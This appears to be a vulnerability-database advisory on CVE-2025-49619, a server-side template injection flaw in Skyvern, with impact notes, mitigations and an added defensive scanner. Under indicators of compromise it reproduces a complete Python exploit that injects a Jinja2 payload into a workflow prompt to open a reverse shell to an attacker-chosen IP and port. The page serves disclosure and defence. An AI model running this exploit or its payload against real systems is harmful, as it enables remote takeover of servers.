Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
AI Analysis
Technical Summary
The Skyvern 0.1.85 vulnerability involves a critical Remote Code Execution (RCE) exploit via Server-Side Template Injection (SSTI). SSTI vulnerabilities occur when user input is unsafely embedded into server-side templates, allowing attackers to inject and execute arbitrary code on the server. In this case, Skyvern version 0.1.85 is susceptible to such an injection, enabling attackers to execute arbitrary commands remotely without authentication or user interaction. The exploit leverages the template engine's unsafe handling of input, allowing attackers to bypass typical security controls and gain full control over the affected system. The presence of exploit code written in Python indicates that proof-of-concept or weaponized scripts are available, facilitating exploitation by attackers with moderate technical skills. Although no CVSS score is assigned, the critical severity rating reflects the high risk posed by this vulnerability due to its ability to compromise confidentiality, integrity, and availability of affected systems. The lack of patch links suggests that no official fix has been released yet, increasing the urgency for mitigation and monitoring.
Potential Impact
For European organizations, this vulnerability poses a significant threat, especially to those relying on Skyvern 0.1.85 in their web infrastructure. Successful exploitation can lead to full system compromise, data breaches, service disruption, and lateral movement within corporate networks. Confidential information, including personal data protected under GDPR, could be exposed or manipulated, resulting in regulatory penalties and reputational damage. Critical sectors such as finance, healthcare, and government agencies are particularly at risk due to their reliance on secure web applications and the sensitivity of their data. Additionally, the ability to execute arbitrary code remotely without authentication increases the attack surface and lowers the barrier for attackers, including cybercriminals and state-sponsored actors. The absence of known exploits in the wild currently provides a limited window for proactive defense, but the availability of exploit code suggests this may change rapidly.
Mitigation Recommendations
Given the absence of an official patch, European organizations should implement immediate compensating controls. First, conduct a thorough inventory to identify all instances of Skyvern 0.1.85 in use. Employ strict input validation and sanitization on all user-supplied data that interacts with template engines to prevent injection. Deploy Web Application Firewalls (WAFs) with custom rules to detect and block SSTI payload patterns, especially those targeting Skyvern. Monitor network traffic and server logs for unusual template-related errors or suspicious command execution attempts. Isolate vulnerable systems within segmented network zones to limit potential lateral movement. Consider temporarily disabling or restricting access to affected services until a patch is available. Engage with vendors or the open-source community for updates or unofficial patches. Finally, conduct security awareness training for developers to avoid unsafe template usage in future deployments.
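Added example (not part of the original page, and not Skyvern's or the exploit author's code): a standard-library Python check for the input-validation and monitoring steps above. It walks a workflow definition of the shape sent to the workflow API and flags Jinja2 spans in block fields that go beyond a plain variable reference. The sample workflow, the `website_url` parameter name, the finding labels, and the assumption that any string field of a block may be rendered are all constructed for illustration.

```python
import json
import re

# Jinja2 delimiters: {{ expression }} and {% statement %}
JINJA_SPAN = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.DOTALL)
# Dunder names (__class__, __subclasses__, __builtins__, ...) reach Python internals
DUNDER = re.compile(r"__[A-Za-z]+__")
# A plain variable or dotted path such as {{ website_url }} or {{ order.id }}
SIMPLE_VAR = re.compile(r"^\s*[A-Za-z_]\w*(\.[A-Za-z_]\w*)*\s*$")


def classify_template(text):
    """Return one finding label per suspicious Jinja2 span in text."""
    findings = []
    for match in JINJA_SPAN.finditer(text):
        expr, stmt = match.group(1), match.group(2)
        body = expr if expr is not None else stmt
        if DUNDER.search(body):
            findings.append("dunder-access")
        elif stmt is not None:
            findings.append("statement-tag")
        elif not SIMPLE_VAR.match(body):
            findings.append("complex-expression")
    return findings


def scan_workflow(workflow):
    """Check every string field of every block (assumed renderable)."""
    hits = []
    blocks = workflow.get("workflow_definition", {}).get("blocks", [])
    for block in blocks:
        for field, value in block.items():
            if isinstance(value, str):
                for finding in classify_template(value):
                    hits.append((block.get("label"), field, finding))
    return hits


# Constructed sample: one ordinary prompt, one that walks the class hierarchy.
SAMPLE = json.loads("""
{"title": "constructed sample", "workflow_definition": {"parameters": [], "blocks": [
  {"label": "block_1", "block_type": "task_v2",
   "prompt": "Open {{ website_url }} and read the invoice total"},
  {"label": "block_2", "block_type": "task_v2",
   "prompt": "{% for x in ().__class__.__base__.__subclasses__() %}{{ x.__name__ }}{% endfor %}"}
]}}
""")

if __name__ == "__main__":
    for label, field, finding in scan_workflow(SAMPLE):
        print(f"{label}.{field}: {finding}")
```

Pattern checks like this are a compensating control for triage and alerting; they do not replace rendering user-supplied templates in a restricted environment.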
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden
Indicators of Compromise
- exploit-code:

```python
# Exploit Title: Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
# Date: 2025-06-15
# Exploit Author: Cristian Branet
# Vendor Homepage: https://www.skyvern.com/
# Software Link: https://github.com/Skyvern-AI/skyvern
# Version: < 0.1.85, before commit db856cd
# Tested on: Skyvern Cloud app / Local Skyvern (Linux Ubuntu 22.04)
# CVE : CVE-2025-49619
# Article: https://cristibtz.github.io/posts/CVE-2025-49619/

'''
Skyvern's Workflow Editor allows prompt injection via Jinja2 template syntax.
An attacker with low privileges can inject a malicious payload in a block that contains Prompt section,
which gets rendered server-side, resulting in blind remote code execution via curl.
'''

import requests, argparse, pyfiglet

parser = argparse.ArgumentParser(description="This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-u", "--url", required=True, help="Skyvern URL (e.g., http://example.com:8080)")
parser.add_argument("-k", "--x-api-key", required=True, help="Go to Skyvern app -> Settings -> API Key -> Reveal and copy the API key")
parser.add_argument("-i", "--ip", required=True, help="IP address to receive the reverse shell connection")
parser.add_argument("-p", "--port", required=True, help="Port for the reverse shell connection")

def create_exploit_workflow(url, ip, port, x_api_key):

    exploit_workflow = {
        "title": "Exploit",
        "description": "",
        "proxy_location": "RESIDENTIAL",
        "webhook_callback_url": "",
        "persist_browser_session": False,
        "model": None,
        "totp_verification_url": None,
        "workflow_definition": {
            "parameters": [],
            "blocks": [
                {
                    "label": "block_1",
                    "continue_on_failure": False,
                    "block_type": "task_v2",
                    "prompt": (
                        "{% for x in ().__class__.__base__.__subclasses__() %}\n"
                        " {% if 'warning' in x.__name__ %}\n"
                        " {{ x()._module.__builtins__['__import__']('os').popen(\n"
                        " \"python3 -c 'import socket,os,pty;\"\n"
                        " \"s=socket.socket();\"\n"
                        f" \'s.connect((\\\"{ip}\\\",{port}));\'\n"
                        " \"os.dup2(s.fileno(),0);\"\n"
                        " \"os.dup2(s.fileno(),1);\"\n"
                        " \"os.dup2(s.fileno(),2);\"\n"
                        " \"pty.spawn(\\\"sh\\\")'\"\n"
                        " ).read() }}\n"
                        " {% endif %}\n"
                        "{% endfor %}"
                    ),
                    "url": "",
                    "max_steps": 25,
                    "totp_identifier": None,
                    "totp_verification_url": None
                }
            ]
        },
        "is_saved_task": False
    }

    headers = {
        "Content-Type": "application/json",
        "X-API-Key": x_api_key
    }

    response = requests.post(f"{url}/api/v1/workflows", json=exploit_workflow, headers=headers)

    if response.status_code == 200:
        print("[+] Exploit workflow created successfully!")
    else:
        print("[-] Failed to create exploit workflow:", response.text)
        return None

    workflow_permanent_id = response.json().get("workflow_permanent_id")

    print(f"[+] Workflow Permanent ID: {workflow_permanent_id}")

    return workflow_permanent_id

def run_exploit_workflow(url, x_api_key, workflow_permanent_id):

    workflow_data = {
        "workflow_id": workflow_permanent_id
    }

    headers = {
        "Content-Type": "application/json",
        "X-API-Key": x_api_key
    }

    response = requests.post(f"{url}/api/v1/workflows/{workflow_permanent_id}/run", json=workflow_data, headers=headers)

    if response.status_code == 200:
        print("[+] Exploit workflow executed successfully!")
    else:
        print("[-] Failed to execute exploit workflow:", response.text)

if __name__=="__main__":

    print("\n")
    print(pyfiglet.figlet_format("CVE-2025-49619 PoC", font="small", width=100))
    print("Author: Cristian Branet")
    print("GitHub: github.com/cristibtz")
    print("Description: This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.")
    print("\n")

    args = parser.parse_args()
    url = args.url
    x_api_key = args.x_api_key
    ip = args.ip
    port = args.port

    workflow_permanent_id = create_exploit_workflow(url, ip, port, x_api_key)

    run_exploit_workflow(url, x_api_key, workflow_permanent_id)
```
Technical Details
- Edb Id: 52335
- Has Exploit Code: true
- Code Language: python
Threat ID: 684fad5ba8c921274383b0e7
Added to database: 6/16/2025, 5:36:27 AM
Last enriched: 6/16/2025, 5:36:38 AM
Last updated: 8/18/2025, 11:32:11 PM